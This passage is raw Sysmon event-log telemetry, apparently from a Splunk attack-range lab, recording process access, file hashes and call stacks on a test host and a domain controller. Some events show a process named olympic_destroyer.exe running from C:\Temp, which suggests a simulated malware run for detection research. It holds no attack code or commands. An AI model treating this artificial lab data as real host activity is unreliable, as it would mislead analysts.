Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-13A3-6216-9A04-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A3-6216-9A04-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-13A3-6216-9A04-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.143{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7749C72E8B10276037FBDBD07B260AC,SHA256=F12FE1E721942A4665FECBC148F210CF16C280717D1E9345A010465A65AFEF96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.959{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.643{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53836-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:47.184{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0E023E553F2C558F4CA52AA8C211ED6,SHA256=DE2D9693DFF59EE16CFF5BF7F2287B969F58FF50AAF9CDF56B862ABA783CCE06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:48.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B447F9889FE144FF045939BEEEE534,SHA256=09E08E069720D9E334A3443F1BBF29E0E0A060131E3106F6B5CE2C8E25C6DD03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:48.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD4BED34D27FF58E56C5323E94AA3C52,SHA256=3EDCA4DD4A6BF44D70F213F14D7E8D2189FA12C56A5481D8685A300BFE850A72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:48.889{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:48.885{C8EA50B7-1389-6216-7306-000000003802}6472C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000293860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:48.218{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CCFF52FBAA4C2F4D271072347F5C3A1,SHA256=3AFF03BC2C71E3A756AD7140369D74A0F85955AED3B91BCB2561FB38F3CD033F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:48.034{4F8D34B0-13A3-6216-9B04-000000003902}3452836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.878{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A5-6216-9D04-000000003902}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 